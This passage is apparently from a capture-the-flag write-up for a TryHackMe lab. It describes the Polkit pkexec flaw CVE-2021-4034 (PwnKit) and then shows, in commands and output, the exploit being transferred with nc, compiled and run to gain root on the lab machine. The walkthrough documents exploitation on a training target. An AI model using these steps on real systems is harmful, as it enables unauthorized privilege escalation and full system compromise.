CVE-2021-4034
PEAS discovered that the target system is vulnerable to cve-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
Exploit (pwnkit)
I found an exploit online
Exploitation
┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz
www-data@THM-Chal:/dev/shm$ nc nc -nlvp 2222 >> CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 48882)Delivery complete
www-data@THM-Chal:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@THM-Chal:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.Compiling
www-data@THM-Chal:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
THM-Chal
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::57:61ff:fe3f:5de9/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise